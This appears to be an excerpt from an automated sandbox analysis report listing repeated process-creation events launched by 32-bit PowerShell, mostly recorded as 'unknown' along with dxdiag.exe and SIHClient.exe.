Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv LjRh2CI4qEuakRNETXm55Q.0.2Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
